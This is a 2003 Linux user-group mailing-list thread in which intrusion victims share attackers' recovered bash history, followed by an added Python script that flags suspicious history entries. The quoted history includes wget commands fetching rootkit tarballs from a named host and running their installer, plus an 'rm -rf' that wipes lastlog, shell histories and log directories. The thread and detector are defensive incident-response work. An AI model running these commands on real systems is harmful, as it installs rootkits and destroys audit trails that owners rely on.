was i hacked

Ryan Ekins pluglist at plug.org
Wed May 7 14:21:12 MDT 2003


I was going through my files and found the text I had copied from my bash
history file when a hacker had compromised my system. I thought I'd add it
to the thread for fun.

wget www.geocities.com/iuli4n/Ci.tgz
tar xvzf Ci.tgz
rm -rf Ci.tgz
cd rk
./install
wget www.geocities.com/iuli4n/UsE.tgz
cd ..
dir -a
wget www.geocities.com/iuli4n/UsE.tgz
tar vxzf Use.tgz
cd rk
./install

I emailed geocities and told them about the user, but they haven't disabled
his account yet.

-Ryan

----- Original Message -----
From: "Uday" <uday at accord.co.in>
To: <pluglist at plug.org>
Sent: Sunday, May 04, 2003 10:11 PM
Subject: Re: was i hacked


> Thanx for all that help & experiences from you guys.  It gave me a big boost
> as whole of the incident was getting on my nerves.
>
> I am planning to wipe off the stuff obviously after taking backup and
> reload with RH9.0 the latest I suppose it must have all the patches as
> Robert suggested.
>
> And as Ryan stated:
> > I had the same thing happen, only they had left the bash history file, so I
> > could see what they did. They had run a root kit program. I did some
> > research and the only thing that I could really do was take my server off
> > line, save home and local directories and re-install.
>
> In this case also he/they have left the bash history file behind but I could
> not really be a Sherlock Holmes : ) Anyway the following were the commands
> which I think were alien:
>
> netstat -an | grep 139
> w
> rm -rf /var/adm/lastlog /root/.bash* /.bash* /root/.bash_history /.bash_history /tmp/* /tmp/.bash_* /var/log/* /etc/log /tmp/log/* /var/log/* /tmp/var/log/* /usr/log/* /usr/adm/log/*
> w
> exit
>
> Anyone who can derive some conclusion out of this is welcomed or any further
> security needed.
>
> Thanx
> -Uday
>
>
>
> .===================================.
> | This has been a P.L.U.G. mailing. |
> |      Don't Fear the Penguin.      |
> `==================================='
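
An added example, not part of the original thread: a small Python triage pass over a recovered shell history that flags the two patterns visible in the commands above, a download followed by running a program from the current directory, and an `rm` aimed at history or log files. The function name, the finding labels and the matching rules are assumptions made for this illustration; the sample lines are taken from the thread, with the `rm` line shortened.

```python
import re
import shlex

FETCHERS = {"wget", "curl", "ftp", "lynx"}
# Arguments that name shell history, login records or log directories.
AUDIT_TRAIL = re.compile(r"\.bash|lastlog|wtmp|utmp|(^|/)log(/|$)")

def triage(history_lines):
    """Return (line_no, finding, command) for suspicious shell-history entries."""
    findings = []
    fetched = False  # has anything been downloaded earlier in this history?
    for no, raw in enumerate(history_lines, 1):
        line = raw.strip()
        if not line:
            continue
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            argv = line.split()
        cmd = argv[0]
        if cmd in FETCHERS:
            fetched = True
            findings.append((no, "download", line))
        elif cmd.startswith("./") and fetched:
            # A program run from the working directory after a download.
            findings.append((no, "run-after-download", line))
        elif cmd == "rm":
            # Only flag deletions whose targets are history or log paths.
            if any(AUDIT_TRAIL.search(arg) for arg in argv[1:]):
                findings.append((no, "audit-trail-deleted", line))
    return findings

# Sample built from the commands quoted in the thread (the rm line is shortened).
SAMPLE = """\
wget www.geocities.com/iuli4n/Ci.tgz
tar xvzf Ci.tgz
rm -rf Ci.tgz
cd rk
./install
netstat -an | grep 139
w
rm -rf /var/adm/lastlog /root/.bash* /root/.bash_history /tmp/* /var/log/* /etc/log
w
exit
""".splitlines()

if __name__ == "__main__":
    for no, finding, command in triage(SAMPLE):
        print(f"{no:>3}  {finding:<20} {command}")
```

A history file that is missing or empty on a box that is in daily use is a finding on its own, since the `rm` line above deletes it.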



